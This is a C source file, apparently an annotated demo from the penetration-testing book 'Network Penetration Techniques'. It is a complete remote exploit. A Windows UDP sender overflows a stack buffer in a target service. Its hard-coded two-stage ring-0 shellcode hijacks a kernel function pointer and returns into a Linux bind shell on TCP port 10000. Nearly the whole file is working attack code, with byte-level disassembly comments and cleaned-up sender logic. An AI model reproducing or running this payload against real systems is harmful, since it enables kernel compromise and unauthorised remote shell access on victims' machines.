/* kipstack_expolit.c
 *
 * Demo program from the book "Network Penetration Techniques" (网络渗透技术)
 * Authors: san, alert7, eyas, watercloud
 *
 * Exploit for the stack overflow in kipstack.c. This file is the Windows
 * (Winsock) sender; the ring-0 / ring-3 payload it delivers is the
 * `shellcode` array below.
 *
 * Build: the original note says `gcc -o kipstack_expolit kipstack_expolit.c`,
 * but the `#pragma comment(lib,"ws2_32")` below is honoured only by MSVC;
 * with MinGW gcc the Winsock library must be linked explicitly:
 *   gcc -o kipstack_expolit kipstack_expolit.c -lws2_32
 */
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"ws2_32")
/* Kernel-space address written into every 4-byte slot of the overflowed
 * frame (see main()). By its name presumably a `jmp esp` gadget inside the
 * target kernel image; this cannot be verified here. It is hard-coded for
 * one specific kernel build and must be recomputed (System.map / vmlinux)
 * before the exploit is pointed at any other target. */
#define JMPESP (0xc0264364)
/* RETLOC2_OFFSET and RETLOC2 are not referenced anywhere in this file;
 * they look like leftovers of an alternative return-location strategy. */
#define RETLOC2_OFFSET 22
/* Distance from the start of the datagram to the saved return address of
 * the vulnerable kipstack.c frame, as laid out by the original authors.
 * main() shifts the real slot a further 8 bytes (data-pointer skew). */
#define EIP_OFFSET 0X10C
/* The payload is placed immediately after the overwritten return address. */
#define SHELLCODE_OFFSET (EIP_OFFSET+4)
#define RETLOC2 0xc01c38e0
/*
 * Two-stage payload delivered after the overwritten return address.
 *
 * Stage 1 (up to the first `ret`) runs in ring 0 on the victim's kernel
 * stack: it relocates stage 2 into scratch space near the kernel-stack base,
 * saves and overwrites a kernel function pointer so that stage 2 is called
 * later, then unwinds the smashed frame and returns normally.
 *
 * Stage 2 (copied by stage 1) scans the kernel stack for an interrupt
 * return frame whose saved CS is the user code selector, redirects that
 * frame's return EIP to 0xbffff000, copies the ring-3 tail there, restores
 * the hijacked pointer, loads user data selectors and `iret`s to it.
 *
 * The ring-3 tail (the already-commented part) is classic Linux x86
 * int 0x80 shellcode: socket / bind / listen / accept / dup2 / execve.
 *
 * NOTE(review): the mnemonics below were decoded from the bytes; they have
 * not been run here. The absolute kernel addresses (0xc02c20a8, 0xc02c2484),
 * the stack/task offsets (0x700, 0x128, 0x220) and the user-stack address
 * 0xbffff000 are all specific to one kernel build / layout and are not
 * computed at run time; the 2.4-era 8 KiB stack assumption (esp & 0xffffe000)
 * is baked in as well.
 */
unsigned char shellcode[] =
/* ---- stage 1: ring 0, executes at the address `jmp esp` lands on ---- */
"\xb8\x00\xe0\xff\xff" // mov eax, 0xffffe000
"\x21\xe7" // and edi, esp       ; edi = base of the 8 KiB kernel stack
"\x81\xc7\x00\x07\x00\x00" // add edi, 0x700     ; scratch area for stage 2 (offset is build-specific)
"\x89\xfd" // mov ebp, edi       ; remember stage-2 destination
"\xe8\x00\x00\x00\x00" // call $+5
"\x5e" // pop esi            ; esi = own address (get-pc)
"\x81\xc6\x28\x00\x00\x00" // add esi, 0x28      ; -> first byte of stage 2 (the `mov eax, esp` below)
"\xb9\xcf\x00\x00\x00" // mov ecx, 0xcf      ; 207 bytes = stage 2 + ring-3 tail + NUL
"\xf3\xa4" // rep movsb          ; relocate stage 2 to edi
"\xb8\xa8\x20\x2c\xc0" // mov eax, 0xc02c20a8 ; kernel function pointer to hijack (build-specific)
"\xbb\x84\x24\x2c\xc0" // mov ebx, 0xc02c2484 ; save slot for the original value (build-specific)
"\x8b\x08" // mov ecx, [eax]
"\x89\x0b" // mov [ebx], ecx     ; save original pointer
"\x89\x28" // mov [eax], ebp     ; point it at the relocated stage 2
"\x81\xc4\x20\x02\x00\x00" // add esp, 0x220     ; skip the smashed frame (size is build-specific)
"\x5b" // pop ebx
"\x5e" // pop esi
"\x5d" // pop ebp
"\xc3" // ret                ; return into the caller as if nothing happened
/* ---- stage 2: ring 0, runs when the hijacked pointer is called ---- */
"\x89\xe0" // mov eax, esp
"\x83\xc0\x04" // scan: add eax, 4
"\x8b\x18" // mov ebx, [eax]
"\x83\xfb\x23" // cmp ebx, 0x23     ; user code selector -> CS slot of an iret frame?
"\x75\xf6" // jne scan
"\x83\xe8\x04" // sub eax, 4        ; eax -> saved EIP slot just below CS
"\x8b\x08" // mov ecx, [eax]
"\x81\xe1\x00\x00\x00\x08" // and ecx, 0x08000000
"\x81\xf9\x00\x00\x00\x08" // cmp ecx, 0x08000000 ; presumably "EIP looks like 0x08xxxxxx user text"
"\x75\x02" // jne +2
"\xeb\x15" // jmp found
"\x8b\x08" // mov ecx, [eax]
"\x81\xe1\x00\x00\x00\x40" // and ecx, 0x40000000
"\x81\xf9\x00\x00\x00\x40" // cmp ecx, 0x40000000 ; presumably "EIP looks like 0x4xxxxxxx library"
"\x74\x05" // je found
"\x83\xc0\x04" // add eax, 4        ; false hit: resume scanning above this frame
"\xeb\xcc" // jmp scan
"\x89\xc4" // found: mov esp, eax   ; esp -> EIP slot of the chosen frame
"\xbd\x00\xf0\xff\xbf" // mov ebp, 0xbffff000 ; user-space destination (no SMAP/SMEP era)
"\x89\x28" // mov [eax], ebp     ; frame's return EIP := 0xbffff000
"\xb8\x00\xe0\xff\xff" // mov eax, 0xffffe000
"\x21\xe0" // and eax, esp       ; current task / stack base
"\xc7\x80\x28\x01\x00\x00\x00\x00\x00\x00" // mov dword [eax+0x128], 0 ; clears a task field at +0x128 - meaning depends on kernel version
"\xeb\x1f" // jmp getpc
"\x5e" // pop esi            ; esi -> ring-3 tail (pushed by the call below)
"\x89\xef" // mov edi, ebp
"\xb9\x00\x04\x00\x00" // mov ecx, 0x400
"\xf3\xa4" // rep movsb          ; copy 1 KiB to user space; over-reads past the ~88-byte tail
"\xb8\xa8\x20\x2c\xc0" // mov eax, 0xc02c20a8
"\xbb\x84\x24\x2c\xc0" // mov ebx, 0xc02c2484
"\x8b\x0b" // mov ecx, [ebx]
"\x89\x08" // mov [eax], ecx     ; restore the hijacked kernel pointer
"\x6a\x2b" // push 0x2b
"\x6a\x2b" // push 0x2b
"\x07" // pop es             ; user data selector
"\x1f" // pop ds
"\xcf" // iret               ; -> ring 3 at 0xbffff000
"\xe8\xdc\xff\xff\xff" // getpc: call back to the `pop esi` above
/* ---- ring-3 tail: Linux x86 bind shell, executed at 0xbffff000 ---- */
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx            ; eax = edx = 0
"\xb0\x66" // mov al, 102        ; sys_socketcall
"\x53" // push ebx           ; protocol 0
"\x43" // inc ebx
"\x53" // push ebx           ; SOCK_STREAM
"\x43" // inc ebx
"\x53" // push ebx           ; AF_INET
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx            ; SYS_SOCKET
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax       ; listening fd
"\x52" // push edx           ; INADDR_ANY
"\x66\x68\x27\x10" // push word 4135    ; bytes 27 10 in memory = network-order port 0x2710 -> TCP 10000, not 4135
"\x43" // inc ebx
"\x66\x53" // push bx            ; AF_INET
"\x89\xe1" // mov ecx, esp       ; -> struct sockaddr_in
"\xb0\x10" // mov al, 16
"\x50" // push eax           ; addrlen
"\x51" // push ecx           ; addr
"\x57" // push edi           ; fd
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h            ; SYS_BIND (ebx == 2)
"\xb0\x66" // mov al, 102
"\xb3\x04" // mov bl, 4          ; SYS_LISTEN, reusing the args still on the stack
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx            ; SYS_ACCEPT
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax       ; accepted client fd
"\xb0\x3f" // mov al, 63         ; sys_dup2
"\x49" // dec ecx
"\xcd\x80" // int 80h            ; dup2(client, ecx) for ecx = 4..0
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx           ; NUL terminator
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh ; "n/sh"
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh ; "//bi"
"\x89\xe3" // mov ebx, esp       ; "//bin/sh"
"\x51" // push ecx           ; argv[1] = NULL
"\x53" // push ebx           ; argv[0]
"\x89\xe1" // mov ecx, esp       ; argv
"\xb0\x0b" // mov al, 11         ; sys_execve (envp = edx = 0)
"\xcd\x80" // int 80h
;
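/* The data pointer computed in kipstack.c lands 8 bytes past where the
 * EIP_OFFSET / SHELLCODE_OFFSET layout assumes, so both the return-address
 * slot and the shellcode are shifted by this much (observation recorded by
 * the original authors). */
enum { DATA_SKEW = 8 };

/*
 * Store a 32-bit value as four little-endian bytes (the target is x86).
 * Replaces the unaligned, strict-aliasing-violating `*(int *)&buf[i]` store.
 */
static void put_le32(unsigned char *dst, unsigned long value)
{
    dst[0] = (unsigned char)(value & 0xff);
    dst[1] = (unsigned char)((value >> 8) & 0xff);
    dst[2] = (unsigned char)((value >> 16) & 0xff);
    dst[3] = (unsigned char)((value >> 24) & 0xff);
}

/*
 * Lay out the attack datagram in BUF (capacity CAP). Layout:
 *   [0, 9)                            'B' marker bytes
 *   [12, EIP_OFFSET + 4)              JMPESP on every 4-byte slot (return-address spray)
 *   [EIP_OFFSET + DATA_SKEW, +4)      JMPESP in the slot the kernel actually pops
 *   [SHELLCODE_OFFSET + DATA_SKEW ..) the `shellcode` array, NUL included
 *   everything else                   'A' filler, plus a 4-byte 'A' trailer
 * Returns the number of bytes to send, or 0 if the payload does not fit.
 */
static size_t build_payload(unsigned char *buf, size_t cap)
{
    const size_t eip_slot = EIP_OFFSET + DATA_SKEW;
    const size_t code_off = SHELLCODE_OFFSET + DATA_SKEW;
    const size_t total = code_off + sizeof(shellcode) + 4;
    size_t i;

    if (total > cap) {
        return 0;
    }
    memset(buf, 0x41, cap);
    /* Spray the return-address gadget over the frame, stopping above offset 10. */
    for (i = EIP_OFFSET; i > 10; i -= 4) {
        put_le32(buf + i, JMPESP);
    }
    for (i = 0; i < 9; i++) {
        buf[i] = 'B';
    }
    memcpy(buf + code_off, shellcode, sizeof(shellcode));
    put_le32(buf + eip_slot, JMPESP);
    return total;
}

/*
 * Resolve HOSTNAME (dotted quad or DNS name) into ADDR.
 * Returns 0 on success, -1 on failure (Winsock error in WSAGetLastError()).
 * Only an AF_INET entry of exactly sizeof(struct in_addr) is accepted; the
 * original copied h_length bytes into a 4-byte field without checking.
 * Note: inet_addr() cannot express 255.255.255.255 (it equals INADDR_NONE).
 */
static int resolve_target(const char *hostname, struct in_addr *addr)
{
    struct hostent *host;
    unsigned long raw = inet_addr(hostname);

    if (raw != INADDR_NONE) {
        addr->s_addr = raw;
        return 0;
    }
    host = gethostbyname(hostname);
    if (host == NULL || host->h_addrtype != AF_INET
        || host->h_length != (int)sizeof(*addr)
        || host->h_addr_list[0] == NULL) {
        return -1;
    }
    memcpy(addr, host->h_addr_list[0], sizeof(*addr));
    return 0;
}

/*
 * Usage: kipstack_expolit host port
 * Sends one UDP datagram carrying the overflow payload to host:port.
 * Returns 0 when the datagram was sent in full, 1 on any error.
 */
int main(int argc, char *argv[])
{
    WSADATA wsd;
    SOCKET s = INVALID_SOCKET;
    SOCKADDR_IN saddr;
    unsigned char sendbuff[1024];
    unsigned long port;
    char *end;
    size_t len;
    int ret;
    int rc = 1;

    printf("shellcode size is %u\n", (unsigned)sizeof(shellcode));
    if (argc < 3) {
        printf("usage: %s host port\n", argv[0]);
        return 1;
    }
    /* atoi() silently truncated out-of-range values into a short; reject them. */
    port = strtoul(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port == 0 || port > 65535) {
        printf("invalid port: %s\n", argv[2]);
        return 1;
    }
    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }
    s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s == INVALID_SOCKET) {
        printf("socket() failed: %d\n", WSAGetLastError());
        goto out;
    }
    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons((unsigned short)port);
    if (resolve_target(argv[1], &saddr.sin_addr) != 0) {
        printf("gethostbyname() failed: %d\n", WSAGetLastError());
        goto out;
    }
    /* connect() on a UDP socket only fixes the default peer for send(). */
    if (connect(s, (SOCKADDR *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
        printf("connect() failed: %d\n", WSAGetLastError());
        goto out;
    }
    len = build_payload(sendbuff, sizeof(sendbuff));
    if (len == 0) {
        printf("payload does not fit in the send buffer\n");
        goto out;
    }
    printf("sending...\n");
    ret = send(s, (const char *)sendbuff, (int)len, 0);
    if (ret == SOCKET_ERROR) {
        printf("send() failed: %d\n", WSAGetLastError());
        goto out;
    }
    if (ret != (int)len) {
        printf("short send: %d of %u bytes\n", ret, (unsigned)len);
        goto out;
    }
    rc = 0;
out:
    /* The original leaked the socket and skipped WSACleanup() on some paths. */
    if (s != INVALID_SOCKET) {
        closesocket(s);
    }
    WSACleanup();
    return rc;
}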